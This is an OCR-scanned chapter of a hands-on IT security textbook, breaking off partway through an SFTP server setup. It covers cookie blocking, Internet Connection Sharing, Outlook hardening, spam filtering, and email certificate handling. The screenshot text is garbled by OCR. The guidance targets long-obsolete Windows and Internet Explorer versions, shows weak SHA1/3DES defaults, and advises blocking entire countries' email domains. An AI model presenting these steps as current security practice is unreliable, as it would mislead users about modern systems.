HTTP. Cookies maintain information as you move from page to page. As an example, if
you go to your airline website to book a flight, you will be presented with several questions,
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such as the date and destination. Cookies help keep track of this information and store it
for your browser to use.

Cookies can also be used by advertisers to track your movement, target you with
specific ads, and even monitor how many times you go to a specific site. That is why cookie
management is such an important issue.

Scenario

You have been tasked with setting up several user computers and have been asked to configure
the systems so that they block third-party cookies.

Scope of Task

Duration
This task should take about 10 minutes.

Setup

For this task, you need a Windows computer, access to the Administrator account, and an
Internet connection.

Caveat

There is a real balance when dealing with cookies. Blocking none can allow the user’s privacy
to be violated, whereas blocking all cookies can cause the user to be endlessly prompted to
accept cookies as they move from web page to web page. Blocking all cookies can even make
some sites inaccessible, so as with most security options, a balance is preferable.

Procedure

In this task, you will learn how to block third-party cookies in Internet Explorer.

Equipment Used

For this task, you must have:

= A Windows computer

s Access to the Administrator account

s An Internet connection

Details

This task will teach you how to block third-party cookies. First-party cookies come from
the site itself, whereas third-party cookies come from the providers of advertising banners
or other graphics that make up a specific web page. These cookies are not used by the site
you are visiting and can be used for advertising or to track your movement. Restricting
these cookies will increase security.
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To block third-party cookies, follow these steps:

1. Cookies are managed in the Tools > Internet Options dialog box in Internet Explorer.
After opening the Internet Options dialog box, choose the Privacy tab.

2. On the Privacy tab, click the Advanced button. These settings will allow you to
customize the handling of cookies. In the Advanced Privacy Settings dialog box, select
the Override Automatic Cookie Handling check box.

3. Once you select that option, settings for first-party and third-party cookies will be
available. You will want to choose to allow all first-party cookies and to block all
third-party cookies. Session cookies should be allowed. You will want to check the
Always Allow Session Cookies box.

Advanced Privacy Settings @

(- “ou can choose how cookies are handled in the nternet
i@ zome. This overrides automatic cookie handling,

Cookies

Override automatic cookie handling

First-party Cookies Third-party Cookies

() Aceept ) Accept
(O Block (=) Block
O Prompt ) Prompt

Alwaps allow session cookies

4. Once these changes have been completed, you should save the settings by clicking OK
and then closing the Internet Options dialog box.

To override the handling of individual websites, click the Edit button on the
TE bottom of the Privacy tab. The resulting dialog box allows you to block or

allow all cookies from a specific site.

Criteria for Completion

You have completed this task when you have configured Internet Explorer to allow all
first-party cookies and block all third-party cookies.

Task 7.4: Using Internet
Connection Sharing

When is a computer more than just a computer? When you make it into a router. That’s
what Internet Connection Sharing (ICS) can do. ICS allows you to use one computer to
route the Internet to one or more secondary computers.
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Without the Internet, some may consider the network a boring place. The typical
network without Internet access consists of one or more computers connected by means of
a hub or switch. With ICS, the network will be configured with the ICS computer bridging
the connection between the hub and the Internet. Its role will be to act as the gateway,
provide Network Address Translation (NAT), and provide dial-on demand if needed.

NAT translates client internal network IP addresses into the appropriate
TE address on the NAT-enabled gateway device and protects internal client IP

addresses by making them invisible to Internet hosts.

Scenario

You have been asked to set up a branch office that is short on funds. They have asked if
you can use an existing computer to route Internet traffic to three other computers in this
small office.

Scope of Task

Duration

This task should take about 30 minutes.

Setup

For this task, you need two Windows computers. The primary computer will need two NIC
cards and the secondary Windows computer will need one NIC card. You will also need
access to the Administrator account on each system and an Internet connection.

Caveat

Although ICS does bypass the need for a router, it places priority on the system providing access.
This computer must be running for other computers in the network to have Internet access.

Procedure

In this task, you will learn how to install and configure ICS.

Equipment Used

For this task, you must have:

s Two Windows 7 computers

= Access to the Administrator accounts

= An Internet connection
s Three NICs
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Details

This task will show you how to install and configure ICS. This method allows you to share
Internet access when a router is not available.

Configuring the ICS Server

1. The first step in this process is to set up the system that will be running ICS. It will be
referred to as the ICS server. Before starting any software configuration, you will need
to install two NICs into this computer.

While only one Ethernet card is required for modem-based ICS sharing, a

TE high-speed, Ethernet-based Internet connection such as Digital Subscriber
Line (DSL) or a cable modem requires the ICS server to have two Ethernet
cards installed.

2. Once the NICs are installed, select Start » Control Panel » Network And Internet >
Network And Sharing Center.

= o=
@@v :‘.: e Metwork and Internet » Metwerk and Sharing Center - | ‘f| | Se Pane yel |
|7|
o
Coentrol Panel Home . . . . . -
View your basic network information and set up connections
Ch lapter setti f | =z See full map
ange adapter settings Lb;‘ - @
Ch, v 1 sh
sEt;:ggf SAn e JOE-PC Metwaork 2 Internet
a (This computer}
View your active networks Connect or disconnect
% Metwork 2 Access type: Internet
T cusicnetwork Connections: [ Local Area Connection
Change your networking settings
ﬁ- Set up a new connection or network
= st up 2 wireless, broadband, dial-up, ad hoc, or VPN connection; or set up 3 reuter or access
point.
i. Connect to a network
Connect or reconnect to a wireless, wired, dial-up, or VPN network connection,
’% Choose homegroup and sharing options
Access files and printers located en other network computers, or change sharing settings.
5 c
rmRE @ Troubleshoot problems
HomeGroup Diagnese and repair network problems, or get troubleshooting infermation,
Internet Opticns
Windows Firewall

3. From the Network And Sharing Center window, click Change Adapter Settings on the
left side of the window.
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If one or more of the required protocols are not present, you can add them

TE by choosing the install option of the network properties page.

4. When the Network Connections window opens, it will display the connections
available on the computer. No wireless connections will be displayed unless wireless is

installed on the computer.

& 5\ _[E =
@le &) «¢ Network and Internet » Network Connections + - ‘ &,l

Organize v

Local Area Connection
Network 2

T Yliware Accelerated AMD PCHet
L_. Local Area Connection
o Network 4

W Mware Accelerated AMD PCHet ..

5. Double-click on Wireless Network Connection, or the connection you wish to share, to
open the Wireless Network Connection Properties dialog box.

b

' Wireless Network Connection Properties

" Networking | Sharing

Intemet Connection Sharing

[ Mllow ather network users to connect through this
computer's Intemet connection

6. When you have verified the settings, click OK to close the dialog box. Click the Close
button to close the Wireless Network Connection Properties dialog box, and close the

Network Connections window.

If a modem is being used on-demand, dialing can be implemented. This
service automatically activates the modem when a computer on the LAN

attempts to access external resources.

TE
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Configuring ICS Clients

1.

Clients using ICS do not need any special software installed. They simply have to be
configured to recognize the proper gateway to access external resources. On the client
systems that will be using the ICS server to access the Internet, select Start » Control
Panel » Network And Internet to start the configuration.

At least one network connection should be listed for your local area connection.
Right-click on the network connection and choose Properties.

You should see several protocols and services installed. Once of these should be
Internet Protocol TCP/IPv4. Highlight the Internet Protocol services and select
Properties.

1 Local Ares Connection Properties @

Metworking

Connect using:

&Y VMware Accelersted AMD PCNet Adapter

This connection uses the following items:

bea Client for Microsoft Networks

.g@nS Packet Scheduler

.gﬁle and Printer Sharing for Microsaft Networks

i Intemet Protocol Version 6 (TCP/IPvE)

«i. Intemet Protocol Version 4 (TCP/IPv4)

i Link-Layer Topology Discovery Mapper 1/0 Driver
b Link-Layer Topology Discovery Responder

[ Install.. ] [ Urinstall Properties

Description

Allows your computer to access resources on & Microsoft
network.

In the Internet Protocol (TCP/IP) Properties dialog box, there are two settings:
= Obtain An IP Address Automatically
s Use The Following IP Address

Choose the first option, Obtain An IP Address Automatically. Also, make sure Obtain
DNS Server Address Automatically is selected.

Click the Advanced button and make sure the various lists in the IP Settings, DNS, and
WINS tabs are all empty. Click OK and then click OK again. This will complete the
ICS configuration on the client computer and you should now have access.

You can check this access by opening a command prompt and pinging www.google
.com. Then open Internet Explorer and browse to www.google. com.

If you cannot connect from an open command prompt, type IPCONFIG /all
TE and verify that your IP address, subnet mask, and default gateway are

correct.
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Criteria for Completion

You have completed this task when you have configured one system with ICS and
configured a second to use the ICS connection to access the Internet.

Task 7.5: Securing Email

Everyone loves email. It’s a fast, convenient way to communicate and send information. It
is also a direct path to your computer for an attacker. If an attacker can get you to open an
attachment or run an attached executable, you may be in real trouble. The Melissa virus
affected 20 percent of all computers in the United States. The I Love You virus caused
$15 billion worth of damage worldwide, and SQL Slammer infected more than 500,000
computers. These numbers should drive home the importance of securing email—the focus
of this task.

Email security starts outside of the Outlook application. Windows systems have a
nasty habit of turning off file extensions. This means that if you get an attachment titled
MyVacationPhoto.jpg, it may really be MyVacationPhoto.jpg.exe, and you may never even
know since file extensions are typically turned off by default.

Scenario

Last week, several computers in your network became infected with a new computer
virus. Management is now very concerned about any vulnerability in the email system.
The organization uses Microsoft Outlook and is most worried about what might slip by
antivirus software. They would like you to harden the application.

Scope of Task

Duration
This task should take about 30 minutes.

Setup

For this task, you need a Windows computer, access to the Administrator account, and the
Microsoft Outlook application.

Caveat

Securing email takes more than just technical expertise. End users must be trained to think
before opening attachments and be taught good email practices.



Task 7.5: Securing Email 3719

Procedure

In this task, you will modify Windows to display file extensions, adjust Outlook for
maximum security when handling graphics, and adjust the security zones.

Equipment Used

For this task, you must have:

= A Windows XP, Windows Visa, or Windows 7 computer
= Access to the Administrator account

s Microsoft Outlook installed

Details

This task will focus on securing email. It is an easy point of attack. If an attacker can get
someone to run his attachment or code, he can take control of the user’s system. This task
will focus on specific ways that Outlook can be hardened and made more secure for the
end user.

Displaying File Extensions

1. Double-click the My Computer icon on the Desktop.

2. Select Tools » Folder Options to open the Folder Options dialog box.

Folder Options 2] x

General |V\ew | File: Typesl Orflire FiIesI

r~ Active Desklop

" Enable Web content on my desktop

= ™ Use Windows classic desktap

e Vi
% @ Enable \Web content in folders

" Use Windaws classic folders

i~ Brovese Folder
r " Open each folder in the same window

" Open each folder in its own window

i~ Click iterrs a3 follo
ﬁ " Single-click to open an item [point to select]
& Underling icon tiles consistent with my browser
£ Underline icon tiles only when || paint at them
" Double-click to open an item [single-click to select]

Restore Defaults |
(1].4 I Cancel | Apply |

3. Select the View tab.
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Folder Options
General  View IF”E Typesl Offline FiIEsI
i~ Folder viey

r— You can zet all of pour folders to the same wiew.
a
H

Like Current Folder I Reset Al Folders

Advanced settings;

|7 Files and Folders

O Display the full path in the address bar
[ Display the full path in title bar
[27 Hidden files and folders
O Do ot show hidden files and folders
® Show hidden files and folders
[ Hids file extensians for knawn file types
[ Hide protected operating system files [Recommended)
[ Launch falder windaws in a separate process
|23 Managing pairs of ‘eb pages and folders
& Show and manage the pair as a single file

Restare Defaults

[ Display compressed files and falders with altemate calar

oK | Cancel |

2l x|
=l
Apply |

On the View tab, uncheck Hide File Extensions For Known File Types. This will
allow you to see file extensions and make more informed decisions when dealing with

attachments. Click OK.
Close the Folder Options window.

Configuring Outlook Security for Graphics

1.

A number of settings can be configured to increase th
place to start is to properly configure Outlook’s secur

e security of Outlook. The best
ity preferences. Open Outlook

and choose Tools » Options to open the Options dialog box.

Preferences |Mail Setup | Mail Formatl Speling | Security | COther |

2=

E-mail

: Change the appearance of messages and the way they are handled.

Junk. E-mail. .. I E-mai\Options...l

Calendar

E Customize the appearance of the Calendar,

v Default reminder: 15 minutes j Calendar Options...

Tasks
=,  Change the appearance of tasks.

Reminder Lime: §:00 AM j Task Optians...

Contacts
8 Change default settings For contact and journal.

= Conkact Options... I Journal Options. .. |
Haotes

Change the appearance of notes.
& MNote Cplions...

O I Cancel |

Apply |
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2. Select the Security tab and click the Change Automatic Download Settings button.

[Dptions 20

Preferences | Mai Setup | Mail Format | Speling  Security |Other |

Encrypted e-mail |
. ™ Encrypt contents and attachments for outgoing messages =

1 I~ add digital signature ta autgoing messages
I send clear text signed message when sending signed messages

I Request S{MIME receipt For all SIMIME signed messages

Default Setting:  [My S/MIME Settings {mikeg@thes =]  Settings... |

Security Zones

Security zanes allow you to customize whether scripts and active
content can be run in HTML messages.

Zone |8 Restricted sites i Zone Settings...

Download Pictures

Change Automatic Dovnload Settings... |

Digital IDs (Certificates)

o Digital IDs or Cerkificakes are documents that allow you to prave your
identity in electronic transactions,

Import[Expart. .. I Get a Digital ITn.. I

’TI Cancel | Apply I

3. The resulting dialog box will let you control how Outlook downloads and handles
pictures. Blocking graphics can help protect your privacy. Malicious individuals can
use graphics requests to verify your identity and detect if they have connected with a
valid email account. Make sure that the Don’t Download Pictures and Warn Me Before
Downloading Content check boxes have been selected.

Automatic Picture Download Settings x|

‘fou can control whether Gutlook automatically downloads and displays
pictures when you open an HTML e-mail message.

Blocking pictures in e-mail messages can help protect wour privacy. Pictures in
HTML e-mail can require Outlook ko download the pictures from a server.
Communicating to an external server in this way can verify to the sender
that your e-mail address is valid, possibly making you the target of maore junk
mailings.

¥ Dor't download pictures or other content automatically in HTML e-mai

I Permit dowrloads in e-mail messages from senders and ko
recipients defined in the Safe Senders and Safe Recipients Lists
used by the Junk E-mail Filker

™ Permit downloads From YWeb sites in this security zone: Trusted
Zone

¥ warn me before downloading content when editing, Forwarding, or

replying ko e-mail
==

4. Click OK to close the Automatic Picture Download Settings dialog box.

Adjusting Security Zones

1. On the Security tab, you will see the Security Zones area. This feature can be used
to control the activity of content, such as scripts, Java, and ActiveX, that can cause
problems. Click the Zone Settings button to open the Security dialog box.
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Click the Custom Level button. This will open the Security Settings dialog box. Scroll
down to Script ActiveX Controls Marked Safe For Scripting and change the setting from
Enable to Prompt. Then click OK. This will return you to the Security dialog box.

Security Settings x|
Settings:
@ Initislize: and script Activei! contrals not marked as safe 2]
{® Disable
Q) Enable

Q) Prompt J
@ Fun Activel controls and plug-ins

O Adrinistrator approved

{® Disable

) Enable

Q) Prompt
@ Script ActiveX contrals marked safe For scripting

) Disable

) Enable

& Em

[#i% Drwurlnacs =
1 | v

i~ Reset custom settings

Reset ko IHigh j Reset |
|

In the Security dialog box, click the Internet icon and choose Custom Level. This will
open the Security Settings dialog box.

In the Security Settings dialog box, you will make several changes to increase security:
= Run Components Not Signed With Authenticode: Prompt

= Font Download: Prompt

s User Authentication: Prompt For User Name And Password

After making these changes, click OK, then click OK again. On the Security tab, click
OK to save your changes and exit the configuration.

Criteria for Completion

You have completed this task when you’ve modified Windows to display file extensions,
adjusted Outlook for maximum security when handling graphics, and adjusted the
security zones.

Task 7.6: Spam Management

Spam is simply unsolicited email. Some surveys show that as much as 80 percent of the
mail that circulates the Internet is spam. Spammers go to great lengths to get this mail into
the recipient’s inbox. One major task for the security professional is to decrease spam and
filter as much as possible.
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One easy way to reduce the amount of spam you must deal with is to increase Outlook’s
junk mail settings to a higher level. There are five options for dealing with junk mail:

Safe Senders List This option allows you to receive messages from email addresses in your
address book and contact list.

Safe Recipients List This is a list of mailing lists or other subscription domain names and
email addresses that you belong to and want to receive messages from.

Blocked Senders List This is a list of domain names and email addresses that you want to

be blocked.

Blocked Encodings List This list allows you to block a language encoding or character
you do not want to receive.

Blocked Top-Level Domains List This list allows you to block top-level domain names.

Scenario

You have been asked to configure the Windows systems to reduce spam.

Scope of Task

Duration
This task should take about 15 minutes.

Setup

For this task, you’ll need a Windows computer, access to the Administrator account, and
an Internet connection.

Caveat

Spammers typically stay at the front of the technology curve. This means that stopping
spam is hard work as each time a defensive technique is implemented, spammers find new
techniques to bypass those defenses.

Procedure

In this task, you will learn how to reduce the amount of spam that an end user must deal with.

Equipment Used
For this task, you must have:
= A Windows XP, Windows Vista, or Windows 7 computer

s Access to the Administrator account
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= Microsoft Outlook

= An Internet connection

Details

This task will teach you how to lock down Microsoft Outlook to more effectively handle
spam and how to install the Outlook spam filter.

Tweaking Outlook to Reduce Spam

1. To configure Outlook to filter a greater amount of spam, select Actions » Junk
E-mail » Junk E-mail Options. Outlook provides its users with four levels of junk-
mail protection:

No Automatic Filtering This option doesn’t filter mail but does send blocked-sender
emails to the junk mail folder.

Low Only the most obvious junk mail is moved to the junk mail folder. This is the
default setting.

High Most junk mail is detected, but so is some legitimate email.

Safe Lists Only Filters mail so that you receive email from only individuals who are on
a Safe Senders List.

Choose the High setting.

Junk'E*mail" Options P9

Options |Safe Senders | Safe Recipients | Blocked Senders | International

| Outlook can move messages that appeat to be junk e-mail into a special

[_0 Jurk E-mail Folder.

Choose the level of junk e-mail protection you want;

(O Mo Automatic Filkering. Mail from blacked senders is still moved ka
the Junk E-mail Folder.

(%) Law: Mave the most abvious junk e-mall ta the Junk E-mail Falder,

(O High: Mast junk e-mail is caught, but same regular mail may be
caught as well. Check your Junk E-mail Folder often.

() 5afe Lists Only: Only mail fram pecple or domains an your Safe
Senders List or Safe Recipients List will be delivered to yvour Inbozx,

[C]Permanently delete suspected junk e-mail instead of maving it ta the
Jurk E-mail Folder

[#] Don't turn on links in messages that might connect to unsafe or
fraudulent sites, To help protect yvour security, we recommend that
you leave this check box selected,

2. Select the International tab and click the Blocked Top-Level Domain List button. The
resulting dialog box will allow you to block email from specific countries.
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Junk' E=mail"Options @

Options | Safe Senders | Safe Recipients | Blacked Senders | International

Eﬁ‘ Some e-mail messages you receive might be written in languages you are
0 unfariliar with and don't want to read, These messages can be marked
as junk and moved to the Junk E-mail Folder.

The sender's e-mail address in different countries/regions can end with
top-level domain codes, such as .ca, .mx, or .us. The Blocked Top-Level
Domain List sllaws you ko block all messages sent From an e-mail address
ending with a specific top-level domain,

EBlocked Top-Level Domain List, .

Characters of each language are contained in & special encoding ar
character set. The Blocked Encoding List allows you to block all e-mail
messages in a specific encoding.

Blocked Encodings List...

3. In the Blocked Top-Level Domain List dialog box, select the following countries to
block email from: China, South Korea, Russia, and Brazil.

Blocked Top=level'Doamain

Select one or more countries regions ko add
ta the Blocked Top-Level Domain List.

[ RE (Reunion} ~ Salact £l
el )
jRu ]

[C] R {Rwanda)
[ 54 (Saudi Arshia)

[ 5B ¢5olomon Islands)

[ 5 (sevychelles: =

[ 50 {Sudan)

[ sE {5weder [V]

Surveys have shown the top five spam-producing countries are China,
TE South Korea, Russia, Brazil, and the United States.

If your company has a legitimate need to communicate with individuals in
TE one of these countries, you would not want to block that particular country.

4. Click OK to close the Blocked Top-Level Domain List dialog box. Then close the Junk
E-mail Options dialog box.

Installing the Outlook Spam Filter

1.  Go to www.spamaid.com/downToad.shtml and download the Office spam filter. Once
the program has been downloaded, install it and accept the default install settings. The
program can be used for 30 days as a trial application.
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2. After the installation, the spam filter will add a set of tools to the Outlook menu bar.
These settings include Mark As Good, Mark As Spam, and Settings.

f IMark as Good ? Mark as Spam %SELtings ﬁ Registration !

3. Click the Settings option. In the resulting dialog box, select the Advanced tab. Under
Treat Messages As Spam, notice that three boxes are already checked. Select If
Message’s Character Set Is Different From English.

SpamAid Settings
W" E hemies H Phiage Filter ” Auto Deletion || About ‘

Filtering optians

J Treat message a3 spam:
‘ﬂ-_ IF“Toc* field is blank
If "From:" field i blank
16" Tae™ and “From:" fields are the same
If message's character set iz different from English
Treat message as good:

[C11F"To:" field containg address fram the fallawing list:

Edit

Marking options

when pou mark a message as spam or good, the filker perfarms a
! : set of actions. Click the button below to edit this set

[ QK ][ Cancel ][ Help ]

4. Select the Phrase Filter tab, and then click the Spam Recognition Keywords button.
The resulting dialog box will allow you to block messages based on keywords.
(Several good spam keywords lists can be found on the Internet. One is at www
.activewebhosting.com/faq/email-filterTist.html.) Use the Spam Recognition
Keywords List dialog box to add to your keywords list. For example, you may want to
add lottery. To do so, click the Add button, enter the word lottery, and click OK.

'.Spam Recognition Keywords".". "

If & meszage containg ane of the following words then it will be
recogrized as spam.
Gamble Add...
Hacker
Pom Femove

[ Close

5. Once you have added all the words in the list, you can close the Spam Recognition
Keywords List dialog box and save your Outlook spam filter settings.
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Criteria for Completion

You have completed this task when you have configured Outlook’s junk email settings and
installed the spam filter.

Task 7.7: Installing and Using
a Digital Certificate

The Internet makes it possible to do business with people from around the world, but this
brings up the issue of trust. How do you establish trust with someone you have never seen? The
answer is digital certificates. Certificates give users the ability to have confidence in the identity
of whom they deal with and can also aid in protecting the confidentiality of information.

Scenario

Management has become worried about spoofing and the lack of ability to determine true
identity during electronic transactions. They have asked for your advice.

Scope of Task

Duration

This task should take about 20 minutes.

Setup

For this task, you’ll need a Windows computer, access to the Administrator account, and
an Internet connection.

Caveat

While digital certificates are very secure, they can be compromised if private key
information is not guarded or if an attacker can get someone to accept a fake certificate.

Procedure

In this task, you will learn how to install and use a digital certificate.

Equipment Used

For this task, you must have:

= A Windows computer

= Access to the Administrator account
= Microsoft Outlook

=  An Internet connection
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Details

This task will show you how to get a certificate, install it into Microsoft Outlook, and use
it to add digital signatures to emails.

Installing a Digital Certificate

1. The first step in this task is to obtain a digital certificate. They can be obtained from
many different vendors, including VeriSign, Comodo, and GeoTrust. In this task, you
will be downloading the certificate from Comodo. They provide certificates for free as
long as they are for noncommercial use.

2. Go to www.comodo.com/home/email-security/free-email-certificate.php to get
your free digital certificate. You will need to fill out a short form. Details on how to
download the certificate will be sent to your email address.

3. Open your email from Comodo and follow the link to the certificate download to
install the certificate in your computer.

To use the certificate, first open Outlook.
Select Tools » Options.

In the Options dialog box, choose the Security tab. Then click the Settings button to
open the Change Security Settings dialog box.

7. In the Change Security Settings dialog box, enter a name for your security setting in
the Security Settings Name field.

Change Security Settings EI
)
Cryptography Format: | S{MIME ~ |
Defaulk Security Setting for this cryptographic message format
[¥] Default Security Setting for all cryptographic messages
| security Labels... | [  mew || Delete | | Password...
Certificates and Algorithms
Signing Certificate:  |mike oreag | [ choose... ]
Hash algorithm: [sHAaL v
Encryption Certificate: [mike areag | [ choose... ]
Encryption Algorithm: | 3DES ~|
[Z] Send these certificates with signed messages
— =

8. Ensure S/MIME is selected from the Cryptography Format drop-down.
9. Check Default Security Setting For This Cryptographic Message Format.
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10. In the Certificates And Algorithms section, click the Choose button for the Signing
Certificate field.

11. In the Select Certificate dialog box, select your secure email certificate.

Select Certificate

Select the certificate you want to use.

Issued to Issued by IntendedP... Friendly na... Expiration ...

£ mike gregg  UTN-USERF... Secure Ema... None 9/6j2007

<

&

[ ok || cancel || view Certificate |

12. View your certificate by clicking the View Certificate button. The Certificate dialog
box displays four tabs, which provide more detail about your certificate. Click on each
tab to learn more about the certificate. After examining the options, click OK to return
to the Select Certificate dialog box and click OK again to select the certificate and
return to the Change Security Settings dialog box.

Certificate - fZl

General | Details | Certification Path | Trust |

Certificate Information

This certificate is intended for the following purpose([s]):
+ Protects e-mail messages

* Refer to the certification authority's statement for details.

Issued to: mike gregg
Issued by: UTHN-USERFirst-Client Authentication and Email

WValid from 3S/5/2006 to 39/6/2007

@ You have a private key that conmesponds to this certificate.

Issuer Statement
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13. While in the Change Security Settings dialog box, make sure Send These Certificates
With Signed Messages is selected.

14. Click OK to return to the Options dialog box and then click OK to return to Outlook.

Using a Digital Certificate

1. With Outlook open, create a new message to send to an associate. You are free to fill out
this message as you see fit. You may simply want to tell a friend you are now using a digital
certificate for email so that your friend will be certain that the mail is really from you.
After creating the message, click the Options button at the top of the Message window.

In the Options dialog box, click the Security Settings button. This will open the Security
Properties dialog box. Select Add Digital Signature To This Message and click Ok.

Security Properties [Xl
[CJEncrypt message contents and attachments
[] add digital signature to this message
[#] Send this message as clear text signed
[CIrequest S{MIME receipt For this message

Security Settings
Security setting:
| <Automatic> ~ | [ change Settings... |
Security Label
Policy Module: | <None> Vl Configure...

Classification:

Privacy Mark

[ ok ] [ canca |

4. Close the Message Options dialog box. Then send your signed email.

Remember, the task has demonstrated the process to sign emails to verify
TE proof of identity. To encrypt emails, you will need to have someone sign

her email and send you her public key.

Criteria for Completion

You have completed this task when you have created and installed a digital certificate.
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Task 7.8: Certificate Backup
and Management

Installing the right certificate on a single computer is only half the battle. As a security expert,
you face more challenges because many users have more than one system. They may want
their certificates installed on their laptops too.

Scenario

Your company is deploying laptops to the sales force and would like you to set up these
laptops to use the existing digital certificates for the employees. Management would also like
you to clear out any other certificates on the system and make a backup copy.

Scope of Task

Duration

This task should take about 15 minutes.

Setup

For this task, you’ll need a Windows computer, access to the Administrator account, and
an Internet connection. You will also need to have completed Task 7.7.

Caveat

Certificates can be misused if stolen or acquired by attackers.

Procedure

In this task, you will work with digital certificates.

Equipment Used

For this task, you must have:

s Two Windows XP, Windows Vista, or Windows 7 computers
= Access to the Administrator account

= An Internet connection

Details

This task will show you how to make a backup copy of a digital certificate and how to clear
out existing certificates to eliminate any that may have been accepted by accident.
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Backing Up an Email Certificate

1. Start Internet Explorer and select Tools » Internet Options. In the Internet Options
dialog box, select the Content tab and click the Certificates button.
Internet Options |‘;|le
| General || Security | Privacy | Content | Connections | Programs || Advanced |
Content Advisor
Ratings help you control the Internet content that can be
wviewed on this computer.
Certificates
% Use certificates to positively identify yourself, certification
authorities. and publishers.
| cClearssLState | [ Ceificates... | [ Publishers... |
Personal information
~ AutoComplete stores previous entries
%'f and suggests matches for you. —
Microsoft Profile Assistant stores your .
personal information. My Prolile. ..
[ oK ] I Cancel i Apply
2. In the Certificates dialog box, on the Personal tab click on the certificate you created in

the previous task and click Export.

Intended purpose:

[<n.|1> vJ

Personal | Other People || Intermediate Certification Authorities | Trusted Root Certificatior € *

Issued To

Issued By
UTN-USERFirst-Client ...

[ Import... ][ Export... ][ Remove ]
Certificate intended purposes
Secure Email, 1.3.6.1.4.1.6449.1.3.5.2
View

Close
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4,
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The Certificate Export Wizard launches. Select Yes, Export The Private Key, then

click Next.

Certificate Export Wizard

Export Private Key
You can choose to export the private key with the certificate.

Private keys are password protected. If you want to export the private key with the
certificate, you must type a password on a later page.

Do you want to export the private key with the certificate?
() Yes, export the private key
() No, do not export the private key

X

[ < Back ][ Next > ][ Cancel

]

On the next wizard screen, select the options Include All Certificates In The

Certification Path If Possible and Enable Strong Protection.

Certificate Export Wizard

Export File Format
Certificates can be exported in a variety of file formats.

Select the format you want to use:
DER encoded binary X.509 (.CER)

Base-64 encoded

09 (.CER)

Cryptographic age tax Standard - PKCS #7 Certificates (.P7B)

Include all certificates in the certification path if possible
(%) Personal Information Exchange - PKCS #12 {.PFX)
Include all certificates in the certification path if possible
[“]Enable strong protection (requires IE 5.0, NT 4.0 SP4 or above)
[[]Delete the private key if the export is successful

X

[ < Back “ Next > ][ Cancel

393
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5. As the wizard continues, you will be asked to choose a password.

Make sure you will be able to remember the password later or you will not
TE be able to access the exported certificate.
6. Select the save location—for example, a CD or USB thumb drive—and give the file

a name such as the YourName-Cert. Leave the Type field set to Personal Information
Exchange (*.pfx).

7.  Once finished, the file and associated private key are saved as a PFX file.

Installing an Email Certificate

Now that you have saved the certificate to a CD or USB thumb drive, it is time to install it
on a second system.

% In real life, this would most likely be a laptop.
TE

1. Start Internet Explorer and select Tools > Internet Options. In the Internet Options
dialog box, select the Content tab and click the Certificates button.

Click the Import button.
The Certificate Import Wizard starts. Click Next.

Browse to select the saved certificate and then click Next. The saved location will be
the CD or USB drive you saved the certificate to.

Certificate Import Wizard @

File to Import
Specify the file you want to import.

File name:
C:\Documents and SettingsiAdministrator\Desktoplcert.pfx ] l Browse.., ]

Note: More than one certificate can be stored in a single file in the following formats:
Personal Information Exchange- PKCS #12 (.PFX,.P12)
Cryptographic Message Syntax Standard- PKCS #7 Certificates (.P78)
Microsoft Serialized Certificate Store (.S5T)

[ < Back ][ Next > ][ Cancel ]
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5. Enter the password you created for the certificate.
6. Allow Windows to automatically select certificate placement.

7. Click Finish, and you have successfully imported a certificate.

Checking for Certificate Revocation

Certificates are valid for only a fixed period of time. Even during this period, things can
happen that might cause a certificate authority or the owner of the certificate to revoke it.
Therefore, it is a good idea to check that certificates are valid before use. Internet Explorer
has the ability to automatically check for certificate revocation.

1. Start Internet Explorer and select Tools > Internet Options. In the Internet Options
dialog box, select the Advanced tab.

2. Scroll down to the Security section. You will notice that some items are already checked.
Leave those as they are, and select the options Check For Publisher’s Certificate
Revocation and Check For Server Certificate Revocation (Requires Restart).

Internet Options

| General || Secuiity | Privacy | Content | Connections || Programs | Advanced

Settings:

Just display the results in the main window ~
Just go to the most likely site H

ecurity

Check for publisher's certificate revocation

Check for server certificate revocation [requires

Check for signatures on downloaded programs

Do not save encrypted pages to disk

Empty Temporary Internet Files folder when browser is closed

Enable Integrated Windows Authentication [requires restart)

Enable Profile Assistant

Use SSL 2.0

Use SSL 3.0

Use TLS 1.0

Warn about invalid site certificates

Warn if changing between secure and not secure mode

Warn if forms submittal is being redirected

<l il | >

w

SRR IKK

&l

[ Restore Defaults |

| oKk || cancet |[ 2ppw |

3. Apply these changes and close the Internet Options dialog box. You have now configured
Internet Explorer to check for invalid certificates before use.
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Criteria for Completion

You have completed this task when you have backed up a certificate, installed a certificate
onto a second system, and changed Internet Explorer’s settings to check for revoked
certificates.

Task 7.9: Performing Secure
File Exchange

Identifying the individuals you communicate with via the Internet is just one of the tasks
that a security professional is faced with. Many times, you are going to want to send or
receive files from these individuals. This needs to be done in a secure way to protect the
confidentiality and integrity of the information.

Scenario

Individuals in your company need to send and receive files to a branch that is opening in
India. Management has tasked you with coming up with a way to do this securely.

Scope of Task

Duration

This task should take about 30 minutes.

Setup

For this task, you need two Windows XP, Windows Vista, or Windows 7 computers; access
to the Administrator account; and an Internet connection.

Caveat

Although there are secure methods to send and receive information, attackers may still
attempt to analyze the flow and amount of encrypted traffic that moves between two
parties. If the flow of information increases, they may infer that a significant event is about
to occur.

Procedure

In this task, you will learn how to implement a secure alternative to File Transfer
Protocol (FTP).
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Equipment Used

For this task, you must have:

Two Windows XP computers
Access to the Administrator account

An Internet connection

Details

This task will teach you how to set up a Secure FTP (SFTP) server and use it to send and
receive files securely.

Setting Up an SFTP Server

1.

This task will involve using the VShell server software from http://vandyke.com/.
The program can be downloaded as a 30-day trial by going to VanDyke Software’s site
and choosing the Download option.

During the installation, accept the default settings and continue with the setup; allow
the system to reboot as needed once the installation is complete.

After the reboot, VShell will automatically load the VShell dialog box.

E7: VShell 21|
Categony:
EI-M General Server Options
~Hast Key
- Key Exchange [~ Server optian:
- Cipher Listening port 22=
MAC al
L. Compression W Enatle keep alives
[=- Authentication =
- Cartcats Maps I Disconnect idle sessions after 0= minutes
- Cerifinate Revocation
-~ RADIUS ~ Command shell
- Deny Host Command shell [CWINNT seystem32,CHD.EXE ]
Access Control
-~ SFTP Cammand arguments:
- Triggers
- Connection Filters - Message of the day fi
Part-Fomward Filters
Logging J
- About
Help OK I Canicel | Apply |

Look first at the Access Control category. VShell uses your existing Windows user
accounts and privileges; there is no need to set up another user list. If you were running
this on a production server, you could simply use the list of users already built in.

In the VShell dialog box, click the Access Control category on the left side. This opens
the Access Control dialog box. In the Name area, you will want to add at least one
user. Click the Add button and then enter a username. For this example, we created the
user Jerry to test the account.
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Categony:
- Host Key
- Key Exchange Hame Add
- Cipher MSTRUT 1Sjemy
?--Mic P INSTRUT hem,
